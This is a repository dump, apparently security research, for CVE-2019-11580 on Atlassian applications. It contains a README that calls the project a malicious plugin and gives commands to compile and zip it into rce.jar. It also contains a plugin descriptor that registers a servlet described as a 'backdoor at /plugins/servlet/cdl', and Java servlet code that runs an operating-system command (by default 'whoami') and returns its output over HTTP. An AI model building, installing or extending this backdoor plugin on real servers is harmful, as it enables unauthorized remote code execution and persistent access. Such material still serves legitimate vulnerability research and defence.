├── CVE-2019-11580 ├── applinks-plugin-5.2.6.jar └── atlassian-shell │ ├── README.md │ ├── atlassian-plugin.xml │ └── com │ └── cdl │ └── shell │ └── Cdl.java └── README.md /CVE-2019-11580/applinks-plugin-5.2.6.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lc/research/795634735d38264e65cb401aba631f8668d0b6f0/CVE-2019-11580/applinks-plugin-5.2.6.jar -------------------------------------------------------------------------------- /CVE-2019-11580/atlassian-shell/README.md: -------------------------------------------------------------------------------- 1 | ## atlassian-shell 2 | A malicious plugin to execute code on Atlassian applications; by default this only executes `whoami`, so people don't just throw up cmd shells everywhere. 3 | 4 | ## compile: 5 | ``` 6 | javac -cp apache-tomcat/lib/servlet-api.jar com/cdl/shell/Cdl.java 7 | zip -r rce.jar atlassian-plugin.xml ./com 8 | ``` 9 | 10 | After installing, the servlet will be available at: `/plugins/servlet/cdl` 11 | 12 | 13 | ## Note: 14 | You'll need the Java SDK; please ensure your version is [supported](https://confluence.atlassian.com/crowd/supported-platforms-191851.html) 15 | 16 | This was built / tested with javac v1.8 17 | 18 | -------------------------------------------------------------------------------- /CVE-2019-11580/atlassian-shell/atlassian-plugin.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | true 4 | 5 | 1.0.0 6 | 7 | 8 | 9 | /cdl 10 | backdoor at /plugins/servlet/cdl 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /CVE-2019-11580/atlassian-shell/com/cdl/shell/Cdl.java: -------------------------------------------------------------------------------- 1 | package com.cdl.shell; 2 | 3 | import javax.servlet.http.*; 4 | import java.io.InputStream; 5 | 6 | public class Cdl extends javax.servlet.http.HttpServlet { 7 | 8 | public void
doGet(HttpServletRequest req, HttpServletResponse res) { /* Handles GET requests: runs the fixed command below and streams its standard output into the HTTP response. Nothing from req is read, and no authentication or authorization check appears in this method; any access control would have to come from outside this class. */ 9 | try { 10 | String cmd="whoami"; /* hard-coded command; not derived from the request */ 11 | String output=""; /* only appended to in the inner catch below; never written to the response or logged */ 12 | try { 13 | if (!cmd.equals("")) { /* always true for the constant above */ 14 | Process p=Runtime.getRuntime().exec(cmd); /* starts a child process of the JVM hosting this servlet; it is never waited on or destroyed here */ 15 | InputStream out=p.getInputStream(); /* the child's standard output */ 16 | InputStream err=p.getErrorStream(); /* obtained but never read or closed */ 17 | int c='\0'; 18 | while ((c=out.read()) != -1) { /* copy standard output one byte at a time until end of stream */ 19 | res.getWriter().write((char)c); /* each byte is cast straight to char, with no charset decoding */ 20 | } 21 | } 22 | } catch(Exception ex) { /* any failure from exec or the copy loop lands here */ 23 | output+="\n"+ex.toString(); /* the failure text is collected and then dropped, so the caller sees no error */ 24 | } 25 | } catch(Exception e) { /* outer catch-all; prints the stack trace to the JVM's standard error */ 26 | e.printStackTrace(); 27 | } 28 | } 29 | 30 | } 31 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # research 2 | miscellaneous security research stuff 3 | --------------------------------------------------------------------------------